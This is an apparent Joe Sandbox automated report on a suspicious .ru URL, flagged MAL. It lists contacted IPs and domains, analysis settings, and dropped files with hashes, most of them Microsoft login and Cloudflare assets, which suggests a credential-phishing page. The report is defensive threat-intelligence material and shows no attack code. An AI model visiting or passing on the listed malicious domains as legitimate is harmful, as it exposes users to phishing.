                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                  https://login.microsoftonline.comchromecache_73.2.dr, chromecache_62.2.drfalse
                                                    high
                                                    https://login.windows-ppe.netchromecache_73.2.dr, chromecache_62.2.drfalse
                                                      high
                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs
                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      104.18.94.41
                                                      challenges.cloudflare.comUnited States
                                                      13335CLOUDFLARENETUSfalse
                                                      104.21.42.208
                                                      aywreru71bxriulr9w5xt2j5yyfcmh7nad9q469mzz3lbp4cdrovxgyj.ivertoneym.ruUnited States
                                                      13335CLOUDFLARENETUSfalse
                                                      151.101.194.137
                                                      code.jquery.comUnited States
                                                      54113FASTLYUSfalse
                                                      35.190.80.1
                                                      a.nel.cloudflare.comUnited States
                                                      15169GOOGLEUSfalse
                                                      172.67.166.74
                                                      unknownUnited States
                                                      13335CLOUDFLARENETUSfalse
                                                      104.17.24.14
                                                      unknownUnited States
                                                      13335CLOUDFLARENETUSfalse
                                                      172.217.18.4
                                                      www.google.comUnited States
                                                      15169GOOGLEUSfalse
                                                      104.18.95.41
                                                      unknownUnited States
                                                      13335CLOUDFLARENETUSfalse
                                                      239.255.255.250
                                                      unknownReserved
                                                      unknownunknownfalse
                                                      188.114.96.3
                                                      2ol.itectaxice.ruEuropean Union
                                                      13335CLOUDFLARENETUStrue
                                                      104.17.25.14
                                                      cdnjs.cloudflare.comUnited States
                                                      13335CLOUDFLARENETUSfalse
                                                      IP
                                                      192.168.2.17
                                                      192.168.2.7
                                                      192.168.2.4
                                                      192.168.2.23
                                                      Joe Sandbox version:42.0.0 Malachite
                                                      Analysis ID:1591007
                                                      Start date and time:2025-01-14 16:09:40 +01:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 3m 47s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:browseurl.jbs
                                                      Sample URL:https://2ol.itectaxice.ru/Qm75/
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Number of analysed new started processes analysed:8
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Detection:MAL
                                                      Classification:mal56.win@20/68@36/15
                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                      • Excluded IPs from analysis (whitelisted): 142.250.185.195, 142.250.185.78, 66.102.1.84, 142.250.185.142, 172.217.16.206, 142.250.184.238, 142.250.185.238, 142.250.185.206, 20.190.159.73, 20.190.159.68, 40.126.31.69, 20.190.159.2, 40.126.31.73, 20.190.159.0, 20.190.159.4, 40.126.31.67, 13.107.6.156, 20.190.159.23, 20.190.159.64, 20.190.159.71, 40.126.32.138, 40.126.32.134, 40.126.32.140, 40.126.32.68, 20.190.160.22, 40.126.32.133, 40.126.32.136, 20.190.160.14, 142.250.186.138, 142.250.184.202, 142.250.185.74, 142.250.185.202, 172.217.16.202, 142.250.184.234, 142.250.186.170, 172.217.18.10, 172.217.23.106, 142.250.186.106, 142.250.185.234, 216.58.206.42, 142.250.181.234, 142.250.185.106, 142.250.185.170, 172.217.16.138, 216.58.206.46, 20.50.80.214, 13.69.239.72, 20.190.159.75, 40.126.31.71, 142.250.184.227, 23.40.179.27, 23.40.179.51, 20.109.210.53, 2.23.242.162, 13.107.246.45
                                                      • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, clientservices.googleapis.com, home-office365-com.b-0004.b-msedge.net, ak.privatelink.msidentity.com, a1894.dscb.akamai.net, clients2.google.com, redirector.gvt1.com, login.live.com, update.googleapis.com, login.mso.msidentity.com, onedscolprdneu11.northeurope.cloudapp.azure.com, www.tm.ak.prd.aadg.trafficmanager.net, prdv4a.aadg.msidentity.com, onedscolprdneu00.northeurope.cloudapp.azure.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, aadcdnoriginwus2.azureedge.net, www.tm.ak.prd.aadg.akadns.net, www.tm.v4.a.prd.aadg.akadns.net, b-0004.b-msedge.net, aadcdn.msauth.net, firstparty-azurefd-prod.trafficmanager.net, login.msa.msidentity.com, eu.events.data.trafficmanager.net, edgedl.me.gvt1.com, nel.measure.office.net.edgesuite.net, aadcdnoriginwus2.afd.azureedge.net, clients.l.google.com, www.tm.lg.prod.aadmsa.trafficmanager.net, eu-mobile.events.data.microsoft.com
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                      • VT rate limit hit for: https://2ol.itectaxice.ru/Qm75/
                                                      No simulations
                                                      No context
                                                      No context
                                                      No context
                                                      No context
                                                      No context
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                                      Category:dropped
                                                      Size (bytes):673
                                                      Entropy (8bit):7.6596900876595075
                                                      Encrypted:false
                                                      SSDEEP:12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
                                                      MD5:0E176276362B94279A4492511BFCBD98
                                                      SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                                      SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                                      SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:GIF image data, version 89a, 352 x 3
                                                      Category:downloaded
                                                      Size (bytes):3620
                                                      Entropy (8bit):6.867828878374734
                                                      Encrypted:false
                                                      SSDEEP:48:ZumKaT5ezv47j2/ZiRDlq16x8XvEUcg777shHdpHVGJqFd:Eal647jPDlL8XvEUcg77kVGyd
                                                      MD5:B540A8E518037192E32C4FE58BF2DBAB
                                                      SHA1:3047C1DB97B86F6981E0AD2F96AF40CDF43511AF
                                                      SHA-256:8737D721808655F37B333F08A90185699E7E8B9BDAAA15CDB63C8448B426F95D
                                                      SHA-512:E3612D9E6809EC192F6E2D035290B730871C269A267115E4A5515CADB7E6E14E3DD4290A35ABAA8D14CF1FA3924DC76E11926AC341E0F6F372E9FC5434B546E5
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://aadcdn.msauth.net/shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.gif
                                                      Preview:GIF89a`.........iii!.......!.&Edited with ezgif.com online GIF maker.!..NETSCAPE2.0.....,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....`.....9..i....Q4......H..j.=.k9-5_..........j7..({.........!.......,....`.....9.......trV.......H....`.[.q6......>.. .CZ.&!.....M...!.......,....`.....8..........:......H..jJ..U..6_....../.el...q.)...*..!.......,....`.....9.....i..l.go.....H..*".U...f......._......5......n..!.......,....`.....:..i......./.....H...5%.kE/5.........In.a..@&3.....J...!.......,....`.....9.......kr.j.....H..*.-.{Im5c..............@&.........!.......,....`.....9.........j..q....H...].&..\.5.........8..S..........!.......,....`.....9.......3q.g..5....H...:u..............Al..x.q.........!.......,....`.....9......\.F....z....H...zX...ov.........h3N.x4......j..!.......,....`.....9........Q.:......H....y..^...1.........n.!.F......E...!.......,....`.....8.........i,......H....*_.21.I.........%...
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                      Category:dropped
                                                      Size (bytes):17174
                                                      Entropy (8bit):2.9129715116732746
                                                      Encrypted:false
                                                      SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                      MD5:12E3DAC858061D088023B2BD48E2FA96
                                                      SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                      SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                      SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 406986
                                                      Category:dropped
                                                      Size (bytes):116343
                                                      Entropy (8bit):7.997640489040715
                                                      Encrypted:true
                                                      SSDEEP:3072:s8ovOS/D3L+TGsLMet6+iNLTMMqfC4hyFv0As5:jNSrij/t6+aAMqfCoydM5
                                                      MD5:3063B0DA40B45B46602FCE99AC53D315
                                                      SHA1:57883FF854B80AD2A76479A0273BE9218B4DA553
                                                      SHA-256:C60FB365DF08D31F36EDA468941C309AE3A917ED784A30495800F05E5F98B66B
                                                      SHA-512:3EAF55117A825B588972F6AE324F6173EF4F2A309BAB69A9A6CC43C8F9A4EE25C2FA86752C8912542CC353727DC54A034B369D4A4451F0C3B20206C16FA9FE98
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:...........k{.H.(.}............'qz<..>.3==..G..(..../m..]kU.T......|x....T.Z...O....T.........e..]../'.o+gp.k.........F....+#..+.{..|X..J.U.`.F.0...W..7.Ie...J2.Y.~.$.L.8....$...P]4..yQ.P99..P?....?........I%....+^0..&p..2..<........Da...J....F.9<.7.*^.+1O*.0J..........h1....[....h..............u".....C%.+..\.>....T`.1....... i......8.TB(.Uh.b.{...@<y..D^.S.....n".<H.L..O..*.t........p6..\[...yCm.J.k.....b..vg....-.j.$........1....p~3.b.....n....[_c..{1WN.l~.=...........?......S.}U..g.......t..../...........|.+...-y.X\...l.....>;."....ye.\.....h..p.f.8...[/..nd.,.......X.?......-....J.....I.;....t..FSw...a7i...c..Y{.-..>a..4h.Eo..c#...O....~..d....Z..z.'...s.D..E...jb.O.F..0.VW>..]%6........x..O>E.'a0U.....w....."..9.az.6....<a.?..<qvx........ct.K..s.C3..d#..#^R.z..A..u.f..........s.....M.rb(.\v.....%.k....i.f...,C.s..bY..K#...~.>..D..j....m.71..}...37h........P{..7!@...|..ZR.]V....."...0.o....7..peCG....px..j.%r2.....R.k5m..s.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (48316), with no line terminators
                                                      Category:dropped
                                                      Size (bytes):48316
                                                      Entropy (8bit):5.6346993394709
                                                      Encrypted:false
                                                      SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                      MD5:2CA03AD87885AB983541092B87ADB299
                                                      SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                      SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                      SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 190152
                                                      Category:downloaded
                                                      Size (bytes):61052
                                                      Entropy (8bit):7.996159932827634
                                                      Encrypted:true
                                                      SSDEEP:1536:HQaq1Q7XOos5ZBIp+1Zr52IGmCJijm1qAxTe9wzf:fq1HoUBIpU5TG7JSmwuTe+b
                                                      MD5:C1E82BF71ADD622AD0F3BF8572F634FC
                                                      SHA1:6CA863D4CAB96669202548D301693B3F5F80B0D5
                                                      SHA-256:BA48AF15D297DB450DC4870242482145ADDB2D18375A4871C490429E2DC5464A
                                                      SHA-512:820A7F8A0C8EA33A8FE1E90CDC35F45DC1E143E836B0D8EA047E1E312F8CAEC72CDEE4E7DB54760A4D749CD0ACFE103A27E39A9A56EB2D704E448A67B0D0C079
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://aadcdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
                                                      Preview:...........iw.F.0.....'W...4)/qH#..D.L.EK...................().}.{..@.z........Qz.,..Ox.....i4..S.&.p......9..W....);a.].a....Y......Y<,.n..."`Is....5....P..|.-..x1.F...@...yRlG.O..5.Q.|.gy.c.^....r.EC.....xd.oL..$./..|3.......r^.j.}...M... )x.D.....%.....B..t....vZ....2L......px.G.1.*.lZYh...$.....,.../.a..;Q...._..#.....e.T.:trA_.0.:.f...........(I.x?.S...<7...o..0.`r.x.+.2..o+...4/..vzY7.C'.....!.r..4n....]P.+a..........._.8,..G>...{.4B....o.9.....r......X3..U.....'.0.@...lrX....r.W\e...].}....(.l......=........3....S..........^=D..[.zw6..e...<WQ.w.(.X..S....>.^.....^B..O-.(..U.R;h..v.......4.Dc .?..z....r.._.Y......M.a.?,...?..U.....OF.w\h$.Q..5....Q.Oj ....5U..8..Y......gYZM....y..OrY.z]B..y..;o.....oT.r...H..{K...Y&Q.......*..W....N4.......].0m..m........E.bc..~..e.. .nzS.i3^......).,Y}.=1H...... V...g.)....X..G...C....@o,.i.~...as...ehEH....u9l.2...y\J.?.(.I.q%..F#..D../>pr$...,...m.6..:,<s..~S.fl;k.'<..}z.Y.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 32 x 47, 8-bit/color RGB, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):61
                                                      Entropy (8bit):3.9778349503715043
                                                      Encrypted:false
                                                      SSDEEP:3:yionv//thPl3A46pikxl/k4E08up:6v/lhP76gk7Tp
                                                      MD5:5E01459821809B3E9F652B4416DB34CB
                                                      SHA1:E2AD8D24C07611EB01A0B297C2BDD4267045BAF2
                                                      SHA-256:82D92C6293D15B922FE50318CF1D3C0430466D7AF89D2C27401857C316E61667
                                                      SHA-512:757699C1CEF49B886EA649EE99600369D1F6A04D7A937991D7F62BDB5B55A5C621841200230E1016CFBF5CE88992D8C7C778D5242E104ABF59DC9DF6C8C43A83
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR... .../......N_v....IDAT.....$.....IEND.B`.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:HTML document, ASCII text, with very long lines (3450), with CRLF line terminators
                                                      Category:downloaded
                                                      Size (bytes):3452
                                                      Entropy (8bit):5.117912766689607
                                                      Encrypted:false
                                                      SSDEEP:96:3qO9I9Sz9KHULI5m4UidBGLosqAsosushswsosry:a2IYz95qTdBac
                                                      MD5:CB06E9A552B197D5C0EA600B431A3407
                                                      SHA1:04E167433F2F1038C78F387F8A166BB6542C2008
                                                      SHA-256:1F4EDBD2416E15BD82E61BA1A8E5558D44C4E914536B1B07712181BF57934021
                                                      SHA-512:1B4A3919E442EE4D2F30AE29B1C70DF7274E5428BCB6B3EDD84DCB92D60A0D6BDD9FA6D9DDE8EAB341FF4C12DE00A50858BF1FC5B6135B71E9E177F5A9ED34B9
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://login.live.com/Me.htm?v=3
                                                      Preview:<script type="text/javascript">!function(t,e){for(var s in e)t[s]=e[s]}(this,function(t){function e(n){if(s[n])return s[n].exports;var i=s[n]={exports:{},id:n,loaded:!1};return t[n].call(i.exports,i,i.exports,e),i.loaded=!0,i.exports}var s={};return e.m=t,e.c=s,e.p="",e(0)}([function(t,e){function s(t){for(var e=f[S],s=0,n=e.length;s<n;++s)if(e[s]===t)return!0;return!1}function n(t){if(!t)return null;for(var e=t+"=",s=document.cookie.split(";"),n=0,i=s.length;n<i;n++){var a=s[n].replace(/^\s*(\w+)\s*=\s*/,"$1=").replace(/(\s+$)/,"");if(0===a.indexOf(e))return a.substring(e.length)}return null}function i(t,e,s){if(t)for(var n=t.split(":"),i=null,a=0,r=n.length;a<r;++a){var c=null,S=n[a].split("$");if(0===a&&(i=parseInt(S.shift()),!i))return;var l=S.length;if(l>=1){var p=o(i,S[0]);if(!p||s[p])continue;c={signInName:p,idp:"msa",isSignedIn:!0}}if(l>=3&&(c.firstName=o(i,S[1]),c.lastName=o(i,S[2])),l>=4){var f=S[3],d=f.split("|");c.otherHashedAliases=d}if(l>=5){var h=parseInt(S[4],16);h&&(c.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 190152
                                                      Category:dropped
                                                      Size (bytes):61052
                                                      Entropy (8bit):7.996159932827634
                                                      Encrypted:true
                                                      SSDEEP:1536:HQaq1Q7XOos5ZBIp+1Zr52IGmCJijm1qAxTe9wzf:fq1HoUBIpU5TG7JSmwuTe+b
                                                      MD5:C1E82BF71ADD622AD0F3BF8572F634FC
                                                      SHA1:6CA863D4CAB96669202548D301693B3F5F80B0D5
                                                      SHA-256:BA48AF15D297DB450DC4870242482145ADDB2D18375A4871C490429E2DC5464A
                                                      SHA-512:820A7F8A0C8EA33A8FE1E90CDC35F45DC1E143E836B0D8EA047E1E312F8CAEC72CDEE4E7DB54760A4D749CD0ACFE103A27E39A9A56EB2D704E448A67B0D0C079
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:...........iw.F.0.....'W...4)/qH#..D.L.EK...................().}.{..@.z........Qz.,..Ox.....i4..S.&.p......9..W....);a.].a....Y......Y<,.n..."`Is....5....P..|.-..x1.F...@...yRlG.O..5.Q.|.gy.c.^....r.EC.....xd.oL..$./..|3.......r^.j.}...M... )x.D.....%.....B..t....vZ....2L......px.G.1.*.lZYh...$.....,.../.a..;Q...._..#.....e.T.:trA_.0.:.f...........(I.x?.S...<7...o..0.`r.x.+.2..o+...4/..vzY7.C'.....!.r..4n....]P.+a..........._.8,..G>...{.4B....o.9.....r......X3..U.....'.0.@...lrX....r.W\e...].}....(.l......=........3....S..........^=D..[.zw6..e...<WQ.w.(.X..S....>.^.....^B..O-.(..U.R;h..v.......4.Dc .?..z....r.._.Y......M.a.?,...?..U.....OF.w\h$.Q..5....Q.Oj ....5U..8..Y......gYZM....y..OrY.z]B..y..;o.....oT.r...H..{K...Y&Q.......*..W....N4.......].0m..m........E.bc..~..e.. .nzS.i3^......).,Y}.=1H...... V...g.)....X..G...C....@o,.i.~...as...ehEH....u9l.2...y\J.?.(.I.q%..F#..D../>pr$...,...m.6..:,<s..~S.fl;k.'<..}z.Y.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                      Category:downloaded
                                                      Size (bytes):1435
                                                      Entropy (8bit):7.8613342322590265
                                                      Encrypted:false
                                                      SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                                      MD5:9F368BC4580FED907775F31C6B26D6CF
                                                      SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                      SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                      SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg
                                                      Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (47520)
                                                      Category:downloaded
                                                      Size (bytes):47521
                                                      Entropy (8bit):5.3981340461317835
                                                      Encrypted:false
                                                      SSDEEP:768:11CQfmIG2Y8rHnzH5ei80aszzQhpdldr6F/PG2XvE2L79noBL5o6HBU91KL5Gc05:1a/0HnzH5eJdV0lGYv7f96Hjy
                                                      MD5:7C92EC9D1395055CE0405A32607C7291
                                                      SHA1:4EF0060484503E7A3D005254484D5A7FACF42F27
                                                      SHA-256:A0DDAE0FB79C4A4A66D8613157A0703771FA9BE1A75790FCCF5EEEBAA329788B
                                                      SHA-512:D5FAD8CE3B4B3603A6C48676E3F561437034F469875608FF1795505BFA89853A63767E32A1E65BC541DF18C555F93DB42896AA0C1EBD9B162EFC1899FE2D925B
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://challenges.cloudflare.com/turnstile/v0/b/e0c90b6a3ed1/api.js
                                                      Preview:"use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Wt(u,o,c,g,h,"next",l)}function h(l){Wt(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:very short file (no magic)
                                                      Category:downloaded
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://aywreru71bxriulr9w5xt2j5yyfcmh7nad9q469mzz3lbp4cdrovxgyj.ivertoneym.ru/zsTJyqSCknJosAIyosVtewsSHSVmVVNLKRTMTTWQLLZIYRKPFDIHEYUXSUGIYXFYQUPUQZ
                                                      Preview:1
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:1
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                      Category:dropped
                                                      Size (bytes):1435
                                                      Entropy (8bit):7.8613342322590265
                                                      Encrypted:false
                                                      SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                                      MD5:9F368BC4580FED907775F31C6B26D6CF
                                                      SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                      SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                      SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                      Malicious:false
                                                      Reputation:low
